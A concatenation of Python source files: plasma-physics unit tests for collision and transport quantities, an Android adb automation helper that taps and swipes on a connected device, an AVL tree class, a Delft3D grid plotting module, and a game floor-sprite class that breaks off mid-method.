with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = collision_frequency(
self.T,
self.n,
self.electrons,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(
self.True_electrons, methodVal.si.value, rtol=1e-1, atol=0.0
)
errStr = (
f"Collision frequency should be {self.True_electrons} and "
f"not {methodVal}."
)
assert testTrue, errStr
def test_protons(self):
"""
Testing collision frequency between protons (ions).
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = collision_frequency(
self.T,
self.n,
self.protons,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(
self.True_protons, methodVal.si.value, rtol=1e-1, atol=0.0
)
errStr = (
f"Collision frequency should be {self.True_protons} and "
f"not {methodVal}."
)
assert testTrue, errStr
def test_zmean(self):
"""
Test collisional frequency function when given arbitrary z_mean.
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = collision_frequency(
self.T,
self.n,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(self.True_zmean, methodVal.si.value, rtol=1e-1, atol=0.0)
errStr = (
f"Collision frequency should be {self.True_zmean} and " f"not {methodVal}."
)
assert testTrue, errStr
class Test_fundamental_electron_collision_freq:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.T_arr = np.array([1, 2]) * u.eV
self.n_arr = np.array([1e20, 2e20]) * u.cm ** -3
self.ion = "p"
self.coulomb_log = 10
# TODO: array coulomb log
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(
fundamental_electron_collision_freq, insert_some_nans, insert_all_nans, {}
)
class Test_fundamental_ion_collision_freq:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.T_arr = np.array([1, 2]) * u.eV
self.n_arr = np.array([1e20, 2e20]) * u.cm ** -3
self.ion = "p"
self.coulomb_log = 10
# TODO: array coulomb log
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(
fundamental_ion_collision_freq, insert_some_nans, insert_all_nans, {}
)
class Test_mean_free_path:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.T = 11604 * u.K
self.n_e = 1e17 * u.cm ** -3
self.particles = ("e", "p")
self.z_mean = 2.5
self.V = 1e4 * u.km / u.s
self.True1 = 4.4047571877932046e-07
def test_symmetry(self):
with pytest.warns(CouplingWarning):
result = mean_free_path(self.T, self.n_e, self.particles)
resultRev = mean_free_path(self.T, self.n_e, self.particles[::-1])
assert result == resultRev
def test_known1(self):
"""
Test for known value.
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = mean_free_path(
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(self.True1, methodVal.si.value, rtol=1e-1, atol=0.0)
errStr = f"Mean free path should be {self.True1} and " f"not {methodVal}."
assert testTrue, errStr
def test_fail1(self):
"""
Tests if test_known1() would fail if we slightly adjusted the
value comparison by some quantity close to numerical error.
"""
fail1 = self.True1 * (1 + 1e-15)
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = mean_free_path(
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = not np.isclose(methodVal.si.value, fail1, rtol=1e-16, atol=0.0)
errStr = (
f"Mean free path value test gives {methodVal} and "
f"should not be equal to {fail1}."
)
assert testTrue, errStr
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(mean_free_path, insert_some_nans, insert_all_nans, {})
class Test_Spitzer_resistivity:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.T = 11604 * u.K
self.n = 1e12 * u.cm ** -3
self.particles = ("e", "p")
self.z_mean = 2.5
self.V = 1e4 * u.km / u.s
self.True1 = 1.2665402649805445e-3
self.True_zmean = 0.00020264644239688712
def test_symmetry(self):
result = Spitzer_resistivity(self.T, self.n, self.particles)
resultRev = Spitzer_resistivity(self.T, self.n, self.particles[::-1])
assert result == resultRev
def test_known1(self):
"""
Test for known value.
"""
methodVal = Spitzer_resistivity(
self.T,
self.n,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(self.True1, methodVal.si.value, rtol=1e-1, atol=0.0)
errStr = f"Spitzer resistivity should be {self.True1} and " f"not {methodVal}."
assert testTrue, errStr
def test_fail1(self):
"""
Tests if test_known1() would fail if we slightly adjusted the
value comparison by some quantity close to numerical error.
"""
fail1 = self.True1 * (1 + 1e-15)
methodVal = Spitzer_resistivity(
self.T,
self.n,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = not np.isclose(methodVal.si.value, fail1, rtol=1e-16, atol=0.0)
errStr = (
f"Spitzer resistivity value test gives {methodVal} and "
f"should not be equal to {fail1}."
)
assert testTrue, errStr
def test_zmean(self):
"""Testing Spitzer when z_mean is passed."""
methodVal = Spitzer_resistivity(
self.T,
self.n,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(self.True_zmean, methodVal.si.value, rtol=1e-1, atol=0.0)
errStr = (
f"Spitzer resistivity should be {self.True_zmean} and " f"not {methodVal}."
)
assert testTrue, errStr
# TODO vector z_mean
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(
Spitzer_resistivity, insert_some_nans, insert_all_nans, {}
)
class Test_mobility:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.T = 11604 * u.K
self.n_e = 1e17 * u.cm ** -3
self.particles = ("e", "p")
self.z_mean = 2.5
self.V = 1e4 * u.km / u.s
self.True1 = 0.13066090887074902
self.True_zmean = 0.32665227217687254
def test_symmetry(self):
with pytest.warns(CouplingWarning):
result = mobility(self.T, self.n_e, self.particles)
resultRev = mobility(self.T, self.n_e, self.particles[::-1])
assert result == resultRev
def test_known1(self):
"""
Test for known value.
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = mobility(
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(self.True1, methodVal.si.value, rtol=1e-1, atol=0.0)
errStr = f"Mobility should be {self.True1} and " f"not {methodVal}."
assert testTrue, errStr
def test_fail1(self):
"""
Tests if test_known1() would fail if we slightly adjusted the
value comparison by some quantity close to numerical error.
"""
fail1 = self.True1 * (1 + 1e-15)
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = mobility(
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = not np.isclose(methodVal.si.value, fail1, rtol=1e-16, atol=0.0)
errStr = (
f"Mobility value test gives {methodVal} and "
f"should not be equal to {fail1}."
)
assert testTrue, errStr
def test_zmean(self):
"""Testing mobility when z_mean is passed."""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = mobility(
self.T,
self.n_e,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(self.True_zmean, methodVal.si.value, rtol=1e-1, atol=0.0)
errStr = f"Mobility should be {self.True_zmean} and " f"not {methodVal}."
assert testTrue, errStr
# TODO vector z_mean
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(mobility, insert_some_nans, insert_all_nans, {})
class Test_Knudsen_number:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.length = 1 * u.nm
self.T = 11604 * u.K
self.n_e = 1e17 * u.cm ** -3
self.particles = ("e", "p")
self.z_mean = 2.5
self.V = 1e4 * u.km / u.s
self.True1 = 440.4757187793204
def test_symmetry(self):
with pytest.warns(CouplingWarning):
result = Knudsen_number(self.length, self.T, self.n_e, self.particles)
resultRev = Knudsen_number(
self.length, self.T, self.n_e, self.particles[::-1]
)
assert result == resultRev
def test_known1(self):
"""
Test for known value.
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Knudsen_number(
self.length,
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(self.True1, methodVal, rtol=1e-1, atol=0.0)
errStr = f"Knudsen number should be {self.True1} and " f"not {methodVal}."
assert testTrue, errStr
def test_fail1(self):
"""
Tests if test_known1() would fail if we slightly adjusted the
value comparison by some quantity close to numerical error.
"""
fail1 = self.True1 * (1 + 1e-15)
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Knudsen_number(
self.length,
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = not np.isclose(methodVal, fail1, rtol=0.0, atol=1e-16)
errStr = (
f"Knudsen number value test gives {methodVal} and "
f"should not be equal to {fail1}."
)
assert testTrue, errStr
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(Knudsen_number, insert_some_nans, insert_all_nans, {})
class Test_coupling_parameter:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.T = 11604 * u.K
self.n_e = 1e21 * u.cm ** -3
self.particles = ("e", "p")
self.z_mean = 2.5
self.V = 1e4 * u.km / u.s
self.True1 = 2.3213156755481195
self.True_zmean = 10.689750083758698
self.True_quantum = 0.3334662805238162
def test_symmetry(self):
result = coupling_parameter(self.T, self.n_e, self.particles)
resultRev = coupling_parameter(self.T, self.n_e, self.particles[::-1])
assert result == resultRev
def test_known1(self):
"""
Test for known value.
"""
methodVal = coupling_parameter(
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(self.True1, methodVal, rtol=1e-1, atol=0.0)
errStr = f"Coupling parameter should be {self.True1} and " f"not {methodVal}."
assert testTrue, errStr
def test_fail1(self):
"""
Tests if test_known1() would fail if we slightly adjusted the
value comparison by some quantity close to numerical error.
"""
fail1 = self.True1 * (1 + 1e-15)
methodVal = coupling_parameter(
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = not np.isclose(methodVal, fail1, rtol=1e-16, atol=0.0)
errStr = (
f"Coupling parameter value test gives {methodVal} and "
f"should not be equal to {fail1}."
)
assert testTrue, errStr
def test_zmean(self):
"""
Test value obtained when arbitrary z_mean is passed
"""
methodVal = coupling_parameter(
self.T,
self.n_e,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(self.True_zmean, methodVal, rtol=1e-1, atol=0.0)
errStr = (
f"Coupling parameter should be {self.True_zmean} and " f"not {methodVal}."
)
assert testTrue, errStr
# TODO vector z_mean
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
# @pytest.mark.parametrize("kwargs", [{"method": "classical"},
# {"method": "quantum"},]) # TODO quantum issues
def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(
coupling_parameter, insert_some_nans, insert_all_nans, {}
)
@pytest.mark.xfail(
reason="see issue https://github.com/PlasmaPy/PlasmaPy/issues/726"
)
def test_quantum(self):
"""
Testing quantum method for coupling parameter.
"""
methodVal = coupling_parameter(
self.T, self.n_e, self.particles, method="quantum"
)
testTrue = np.isclose(self.True_quantum, methodVal, rtol=1e-1, atol=0.0)
errStr = (
f"Coupling parameter should be {self.True_quantum} and " f"not {methodVal}."
)
assert testTrue, errStr
def test_kwarg_method_error(self):
"""Testing kwarg `method` fails is not 'classical' or 'quantum'"""
with pytest.raises(ValueError):
coupling_parameter(self.T, self.n_e, self.particles, method="not a method")
|
# -*- coding: utf-8 -*-
'''
create by: 小宝
mail: <EMAIL>
create date: 2019.8.3
Purpose: base class be used to app extends
'''
import sys
import re
import random
import time
import base64
from PIL import Image
sys.path.append('../')
from common.auto_adb import auto_adb
from common import config
from common import screenshot
from common import debug
class app():
adb = auto_adb()
def __init__(self):
# 检查设备是否连接
self.adb.test_device()
# 打印设备信息
# debug.dump_device_info()
pass
# 打开应用
def _open_app(self, main_activity, delay):
current = self._is_focused_activity_super(main_activity)
if current:
return True
else:
cmd = 'shell am start -n {activity}'.format(
activity = main_activity
)
self.adb.run(cmd)
time.sleep(delay)
current = self._is_focused_activity_super(main_activity)
if current:
return True
else:
print('目前未能显示主页窗口可能原因:息屏状态、被弹窗覆盖等,重试中...')
return False
pass
# 模拟点击菜单后判断是否打开了目标activity
def _is_focused_activity_super(self, activity):
# 获取当前的activity
cmd = 'shell dumpsys window | findstr mFocusedWindow'
output = self.adb.run(cmd)
# print(output)
index = output.find(activity, 0, len(output))
if index < 0 :
return False
else:
return True
pass
# 设置输入法
def set_ime(self, ime):
config_data = config.open_accordant_config('common')
name = config_data[ime]['name']
# 1.检测输入法是否安装
cmd = 'shell ime list -a'
output = self.adb.run(cmd)
index = output.find(name, 0, len(output))
if index < 0 :
print('未安装{}输入法,安装后使用!'.format(name))
exit(0)
# 2.输入法设置
cmd = 'shell ime set {}'.format(name)
output = self.adb.run(cmd)
index = output.find('selected', 0, len(output))
if index < 0 :
print('设置{}输入法失败,手动设置后使用'.format(name))
exit(0)
pass
# 新定义的点击操作
def _click_operate(self, current, x, y, delay, expect = '', retry = 0):
if not self._is_focused_activity_super(current):
return False
cmd = 'shell input tap {x} {y}'.format(
x=x + self._random_bias(10),
y=y + self._random_bias(10)
)
self.adb.run(cmd)
time.sleep(delay)
if expect == '':
return True
for i in range(retry):
i += 1
if self._is_focused_activity_super(expect):
return True
return False
pass
# 点击操作
def click(self, x, y):
cmd = 'shell input tap {x} {y}'.format(
x=x + self._random_bias(10),
y=y + self._random_bias(10)
)
self.adb.run(cmd)
pass
# 点击区域随机偏置
def _random_bias(self, num):
return random.randint(-num, num)
pass
# 滑动屏幕
def swipe_operate(self, x1, y1, x2, y2, delay, duration = 200):
cmd = 'shell input swipe {x1} {y1} {x2} {y2} {duration}'.format(
x1 = x1,
y1 = y1,
x2 = x2,
y2 = y2,
duration = duration
)
self.adb.run(cmd)
time.sleep(delay)
pass
# 模拟返回按键
def back_expect_page(self, current_activity, expect_activity, delay, retry):
cmd = 'shell input keyevent 4'
is_current_activity = self._is_focused_activity_super(current_activity)
if is_current_activity:
for i in range(retry):
self.adb.run(cmd)
i += 1
time.sleep(delay)
is_expect_activity = self._is_focused_activity_super(expect_activity)
if is_expect_activity:
return True
print('已完成操作,尝试返回{}'.format(i))
return False
pass
# 截屏返回图像数据
def screen_to_img(self, name = '', region = ()):
im = screenshot.pull_screenshot()
if not name:
name = './tmp/screen.png'
if region:
crop_img = im.crop(region)
crop_img.save(name)
with open(name, 'rb') as bin_data:
image = bin_data.read()
return image
pass
|
<reponame>en0/pyavl3
from typing import Hashable, Tuple, Iterator, Iterable, Union, Dict
from .avl_node import AVLNode
from .interface import ADTInterface
from .traversal import InOrderTraversal, BreadthFirstTraversal
class AVLTree(ADTInterface):
# Used for iterator
traversal = InOrderTraversal
@property
def root(self) -> AVLNode:
"""Gets the current root"""
return self._root
def __init__(
self,
iterable: Union[
Dict[Hashable, any],
Iterable[Tuple[Hashable, any]],
"AVLTree"
] = None,
**kwargs,
) -> None:
self._root: AVLNode
self._n: int
self.clear()
if isinstance(iterable, dict):
for k, v in iterable.items():
self[k] = v
elif isinstance(iterable, AVLTree):
for n in BreadthFirstTraversal(iterable, lambda x: x):
self[n.key] = n.value
elif iterable is not None:
for k, v in iterable:
self[k] = v
for k, v in kwargs.items():
self[k] = v
def __getitem__(self, key: Hashable) -> any:
"""Get the value at the given key.
If the key is not found, a KeyError will be raised.
O(logn) - The AVL tree is balanced, h is always near log(n).
"""
node = self._get(self._root, key)
if node is None:
raise KeyError(key)
return node.value
def __setitem__(self, key: Hashable, value: any) -> None:
"""Add or Update the given key using the given value.
O(logn) - The AVL tree is balanced, h is always near log(n).
rebalance operation is done in-line on stack return.
"""
node = AVLNode(key, value)
self._root = self._insert(self._root, node)
def __delitem__(self, key: Hashable) -> None:
"""Remove the given key from the tree.
O(logn) - Delete operation might have to do a secondary lookup
when swapping nodes in wort-case deletes. The actual
execution might be 2logn if a delete requires a swap
"""
self._root = self._delete(self._root, key)
def __len__(self) -> int:
"""Return the count of members in the tree.
O(1) - length is maintained during operations that modify it.
"""
return self._n
def __contains__(self, key: Hashable) -> bool:
"""Check if a given key exists in the tree
O(logn) - The AVL tree is balanced, h is always near log(n).
"""
return self._get(self._root, key) is not None
def __iter__(self) -> Iterator[Tuple[Hashable, any]]:
"""Create and return an iterator
By default this creates an InOrderTraversal iterator. This
functionality can be overriden by setting AVLTree.traversal
to another implementation.
O(n) - and that is all i am going to say about that.
"""
return AVLTree.traversal(self, lambda x: x.key)
def __repr__(self) -> str:
"""Return a string reprsentation of the AVLTree
O(n) - This repr prints every member much like dict.
"""
m = BreadthFirstTraversal(self, lambda x: f"{x.key}: {x.value}")
s = ", ".join(m)
return f"<AVL {{{s}}}>"
def __bool__(self) -> bool:
"""Return True if the Tree has members. Else, false.
O(1) - because root is not null.
"""
return self._root is not None
def get(self, key: Hashable, default: any = None) -> any:
"""Get the value at the given key or default.
O(logn) - The AVL tree is balanced, h is always near log(n).
"""
node = self._get(self._root, key)
if node is None:
return default
return node.value
def keys(self) -> Iterator[Hashable]:
"""Create and return a key iterator
By default this creates an InOrderTraversal iterator. This
functionality can be overriden by setting AVLTree.traversal
to another implementation.
O(n) - and that is all i am going to say about that.
"""
return AVLTree.traversal(self, lambda x: x.key)
def items(self) -> Iterator[Tuple[Hashable, any]]:
"""Create and return a item iterator
By default this creates an InOrderTraversal iterator. This
functionality can be overriden by setting AVLTree.traversal
to another implementation.
O(n) - and that is all i am going to say about that.
"""
return AVLTree.traversal(self, lambda x: (x.key, x.value))
def values(self) -> Iterator[Hashable]:
"""Create and return a value iterator
By default this creates an InOrderTraversal iterator. This
functionality can be overriden by setting AVLTree.traversal
to another implementation.
O(n) - and that is all i am going to say about that.
"""
return AVLTree.traversal(self, lambda x: x.value)
def clear(self) -> None:
"""Clear all nodes from the tree.
O(1) - If you ignore GC
"""
self._root = None
self._n = 0
def copy(self) -> "AVLTree":
"""A shallow copy of the AVLTree
O(n) - When copying the order is done in a way that
avoids rebalance operations. It's as quick as
it can be without magic.
"""
# using a breadth first traversal will eliminate the need
# for rebalances needed when constructing the new root.
return AVLTree(self)
def setdefault(self, key: Hashable, value: any) -> None:
"""Insert key with the given value into the tree if it does not exist.
O(logn) - The AVL tree is balanced, h is always near log(n).
"""
if key not in self:
self[key] = value
def update(
self,
iterable: Union[
Dict[Hashable, any],
Iterable[Tuple[Hashable, any]],
"AVLTree"
] = None,
**kwargs
) -> None:
"""Update the AVLTree using keys from given iterable
O(vlogn) - where v is the number of items being updated.
"""
if isinstance(iterable, dict):
for k, v in iterable.items():
self[k] = v
elif isinstance(iterable, AVLTree):
for n in BreadthFirstTraversal(iterable, lambda x: x):
self[n.key] = n.value
elif iterable is not None:
for k, v in iterable:
self[k] = v
for k, v in kwargs.items():
self[k] = v
def pop(self, key: Hashable) -> any:
"""Pop an item out of the Tree and return the value.
O(logn) - This method actualy calls 2 logn methods.
"""
_, value = self.popitem(key)
return value
def popitem(self, key: Hashable) -> Tuple[Hashable, any]:
"""Pop an item out of the Tree and return the key and value.
O(logn) - This method actualy calls 2 logn methods.
"""
n = self._get(self._root, key)
if n is None:
raise KeyError(key)
self._root = self._delete(self._root, n.key)
return n.key, n.value
@classmethod
def fromkeys(cls, iterable: Iterable[Hashable], value: any = None) -> "AVLTree":
"""Returns a new AVLTree with keys from iterable and values equal to value.
O(n) - Rebalance operations are likely so it's a slow O(n)
"""
return AVLTree([(k, value) for k in iterable])
def _get(self, root: AVLNode, key: Hashable) -> AVLNode:
"""Find a key in the given subtree"""
if root is None:
# Key is not in subtree
return None
elif key < root.key:
# If key exists, it must be left
return self._get(root.left, key)
elif key > root.key:
# If key exists, it must be right
return self._get(root.right, key)
elif key == root.key:
# Found it.
return root
def _delete(self, root: AVLNode, key: Hashable) -> AVLNode:
"""Find and remove the given key from the given subtree."""
if root is None:
# This key is not in the given sub-tree
raise KeyError(key)
elif key < root.key:
# If the key exists, it must be left
root.left = self._delete(root.left, key)
elif key > root.key:
# If the key exists, it must be right
root.right = self._delete(root.right, key)
elif root.left and root.right:
# Replace K with the Min(T2)
# r r
# / \ / \
# K T3 -> T2 T3
# / \ /
# T1 T2 T1
# assert(root.key == key)
new_root = self._pop_right_min(root)
new_root.left = root.left
new_root.right = root.right
# Since we poped a node off, _n is already
# updated since _delete was used to remove it.
# Do not update _n here. the number is correct.
return new_root
elif root.left:
# Replace K with T1
# r r
# / \ / \
# K T3 -> T1 T3
# /
# T1
# assert(root.key == key)
self._n -= 1
return root.left
elif root.right:
# Replace K with T1
# r r
# / \ / \
# K T3 -> x T3
# \
# T1
# assert(root.key == key)
self._n -= 1
return root.right
else:
# Replace K with NULL
# r r
# / \ -> \
# K T3 T3
# assert(root.key == key)
self._n -= 1
return None
# Recompute hight of root
root.height = self._compute_height(root)
# return the balanced subtree
return self._rebalance(root)
def _insert(self, root: AVLNode, node: AVLNode) -> AVLNode:
"""Insert a node into a subtree"""
if root is None:
# Node fits here! Insert it.
self._n += 1
return node
elif node.key < root.key:
# Node fits left of this root
root.left = self._insert(root.left, node)
elif node.key > root.key:
# Node fits right of this root
root.right = self._insert(root.right, node)
elif node.key == root.key:
# Node is already in the tree.
# Update it.
root.value = node.value
# Recompute hight of root
root.height = self._compute_height(root)
# return the balanced subtree
return self._rebalance(root)
def _pop_right_min(self, root: AVLNode) -> AVLNode:
"""Remove the min from the right side of the given subtree"""
n = self._get_min(root.right)
root.right = self._delete(root.right, n.key)
return n
@classmethod
def _rebalance(cls, root: AVLNode) -> AVLNode:
"""Rebalance the immediate subtree."""
balance = cls._compute_balance(root)
if balance > 1: # left heavy
if cls._compute_balance(root.left) < 0:
root.left = cls._rotate_left(root.left)
return cls._rotate_right(root)
elif balance < -1: # Right heavy
if cls._compute_balance(root.right) > 0:
root.right = cls._rotate_right(root.right)
return cls._rotate_left(root)
return root
@classmethod
def _rotate_right(cls, x: AVLNode) -> AVLNode:
"""Rotate a subtree around x.left"""
# Rotate right, pivot on y
# x y
# / \ / \
# y T3 --> T1 x
# / \ / \
# T1 T2 T2 T3
y = x.left
t2 = y.right
y.right = x
x.left = t2
# x hight is used to compute y hight
# so compute x firt.
x.height = cls._compute_height(x)
y.height = cls._compute_height(y)
return y
@classmethod
def _rotate_left(cls, y: AVLNode) -> AVLNode:
"""Rotate a subtree around y.right"""
# Rotate left, pivot on x
# x y
# / \ / \
# y T3 <-- T1 x
# / \ / \
# T1 T2 T2 T3
x = y.right
t2 = x.left
x.left = y
y.right = t2
# y hight is used to compute x hight
# so compute y firt.
y.height = cls._compute_height(y)
x.height = cls._compute_height(x)
return x
@classmethod
def _get_min(cls, root: AVLNode) -> AVLNode:
"""Find the min value in a given subtree"""
if root.left is None:
return root
return cls._get_min(root.left)
@classmethod
def _height(cls, root: AVLNode) -> int:
"""Get the normalized height of the given node.
If the node is null, -1 will be returned.
"""
if root is None:
return -1
return root.height
@classmethod
def _compute_height(cls, root: AVLNode) -> int:
"""Compute the hight of the given subtree."""
return max(cls._height(root.left), cls._height(root.right)) + 1
@classmethod
def _compute_balance(cls, root: AVLNode) -> int:
"""Compute the balance of the given subtree."""
return cls._height(root.left) - cls._height(root.right)
|
<filename>stompy/model/delft/dflow_grid.py
# see how involved a NEFIS reader in native python/numpy would be
import os
import sys
import numpy as np
import matplotlib.pyplot as plt
import memoize
import matplotlib.tri as tri
class DflowGrid2D(object):
def __init__(self,xcor,ycor,xz,yz,active):
self.xcor=xcor
self.ycor=ycor
self.xz=xz
self.yz=yz
self.active=active
comp=(active==1) # computational cells
self.node_active=comp.copy()
self.node_active[:-1,:-1] = comp[1:,1:] | comp[:-1,1:] | comp[1:,:-1] | comp[:-1,:-1]
@staticmethod
def from_nef_map(nef):
xcor=nef['map-const'].getelt('XCOR',[0])
ycor=nef['map-const'].getelt('YCOR',[0])
xz=nef['map-const'].getelt('XZ',[0])
yz=nef['map-const'].getelt('YZ',[0])
active=nef['map-const'].getelt('KCS',[0])
return DflowGrid2D(xcor,ycor,xz,yz,active)
def wireframe(self):
# this method double-draws interior lines.
coll=self.pcolor_face(0*self.xcor)
coll.set_array(None)
coll.set_facecolors('none')
return coll
def pcolor_face(self,v):
vmsk=np.ma.masked_where(self.active!=1,v)
return plt.pcolor( self.xcor[:-1,:-1],
self.ycor[:-1,:-1],
vmsk[1:-1,1:-1],
edgecolors='k',lw=0.2)
def pcolormesh_node(self,v):
vmsk=np.ma.masked_where(~self.node_active,v)
return plt.pcolormesh( self.xcor[:-1,:-1],
self.ycor[:-1,:-1],
vmsk[:-1,:-1],
edgecolors='k',lw=0.2,
shading='gouraud')
@memoize.memoize()
def to_triangulation(self):
# map 2d node index to 1d index - not yet compressed.
idx1d=np.arange(np.prod(self.xcor.shape)).reshape(self.xcor.shape)
tris=[]
comp=(self.active==1)[1:-1,1:-1]
for row,col in zip(*np.nonzero(comp)):
# may not be CCW
tris.append( [ idx1d[row,col],
idx1d[row,col+1],
idx1d[row+1,col+1] ] )
tris.append( [ idx1d[row+1,col+1],
idx1d[row+1,col],
idx1d[row,col] ] )
used=np.unique(tris)
x=self.xcor.ravel()[used]
y=self.ycor.ravel()[used]
remap=np.zeros(np.prod(self.xcor.shape))
remap[used] = np.arange(len(used))
orig_tris=tris
tris=remap[tris] # these now index
T=tri.Triangulation(x,y,tris)
idx_map=used
return T,idx_map
def pcolor_node(self,v,**kws):
my_kws=dict(shading='gouraud')
my_kws.update(kws)
T,idx_map = self.to_triangulation()
return plt.tripcolor(T,v.ravel()[idx_map],**my_kws)
def contourf_node(self,v,*args,**kws):
T,idx_map = self.to_triangulation()
return plt.tricontourf(T,v.ravel()[idx_map],*args,**kws)
|
<filename>hecate/engine/world/floor.py
import random
import arcade
from ...assets.sprites import FLOOR, ALTAR, FLOOR_DECO
class Floor(arcade.Sprite):
def __init__(self, direction):
super().__init__(scale=1)
# For readability
self.wall_directions = []
if 1 & direction == 1:
self.wall_directions.append('e')
if 2 & direction == 2:
self.wall_directions.append('se')
if 4 & direction == 4:
self.wall_directions.append('s')
if 8 & direction == 8:
self.wall_directions.append('sw')
if 16 & direction == 16:
self.wall_directions.append('w')
if 32 & direction == 32:
self.wall_directions.append('nw')
if 64 & direction == 64:
self.wall_directions.append('n')
if 128 & direction == 128:
self.wall_directions.append('ne')
if 'e' in self.wall_directions and 'w' in self.wall_directions:
self.texture = random.choice(FLOOR[23:25])
elif 'n' in self.wall_directions and 's' in self.wall_directions:
self.texture = random.choice(FLOOR[21:23])
elif 'n' in self.wall_directions and 'w' in self.wall_directions:
self.texture = random.choice([FLOOR[1], FLOOR[60]])
elif 's' in self.wall_directions and 'w' in self.wall_directions:
self.texture = random.choice([FLOOR[3], FLOOR[58]])
elif 's' in self.wall_directions and 'e' in self.wall_directions:
self.texture = random.choice([FLOOR[4], FLOOR[57]])
elif 'n' in self.wall_directions and 'e' in self.wall_directions:
self.texture = random.choice([FLOOR[2], FLOOR[59]])
else:
if len(self.wall_directions) == 3:
if 'n' in self.wall_directions:
self.texture = random.choice(FLOOR[8:11])
elif 'w' in self.wall_directions:
self.texture = random.choice(FLOOR[5:8])
elif 's' in self.wall_directions:
self.texture = random.choice(FLOOR[11:14])
else:
self.texture = random.choice(FLOOR[14:17])
elif len(self.wall_directions) == 2:
if 'n' in self.wall_directions:
self.texture = random.choice(FLOOR[8:11])
elif 'w' in self.wall_directions:
self.texture = random.choice(FLOOR[5:8])
elif 's' in self.wall_directions:
self.texture = random.choice(FLOOR[11:14])
elif 'e' in self.wall_directions:
self.texture = random.choice(FLOOR[14:17])
else:
if 'nw' in self.wall_directions and 'ne' in self.wall_directions:
self.texture = FLOOR[53]
elif 'nw' in self.wall_directions and 'sw' in self.wall_directions:
self.texture = FLOOR[54]
elif 'se' in self.wall_directions and 'ne' in self.wall_directions:
self.texture = FLOOR[55]
else:
self.texture = FLOOR[56]
elif len(self.wall_directions) == 5:
if 'n' in self.wall_directions:
self.texture = FLOOR[38]
elif 'w' in self.wall_directions:
